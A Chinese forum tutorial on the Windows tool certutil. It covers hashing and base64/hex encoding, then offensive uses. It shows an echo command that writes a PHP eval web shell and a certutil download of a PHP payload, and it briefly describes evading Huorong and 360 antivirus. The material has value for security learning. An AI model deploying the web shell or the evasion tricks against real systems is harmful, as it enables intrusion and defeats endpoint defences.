Windows自带渗透工具certutil的使用与Bypass技巧-山海云端论坛

一：Certutil.exe – Windows自带的渗透利器

Certutil位于C:\Windows\System32\目录下，可直接调用。

二：Certutil的三大作用

散列： 用于比对文件MD5。

<code>certutil -hashfile file md5/sha1/sha256 </code>

示例：创建两个文件，1.txt和2.txt，它们的md5相同，表明文件内容相同。

编码解码： 可对文件进行base64或hex编码。

Base64编码：

<code>certutil -encode/-decode src_file des_file</code>

Hex编码：

<code>certutil -encodehex/-decodehex src_file des_file</code>

传输文件： 从互联网下载文件。

<code>certutil -urlcache -f -split http://.....</code>

三：渗透中Certutil的艺术

写马： 传输脚本文件或可执行文件。

使用Echo：

<code>echo ^<?php @eval($_POST[1]);;?^> > 1.txt</code>

使用Certutil下载：

<code>certutil -urlcache -f -split http://...../test1.php</code>

绕过杀软： 针对火绒和360等杀软的绕过策略。

火绒：

添加无用字符：@, ;, ^, "等。

使用系统目录下的exe文件进行下载。

360：

删除Certutil的详细信息，更换图标。

版权声明 1 本网站名称：山海云端-专注于PHP与网络安全
2 本站永久网址：www.shserve.cn
3 本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长 QQ1790643379进行删除处理。
4 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END

Windows自带渗透工具certutil的使用与Bypass技巧

请登录后发表评论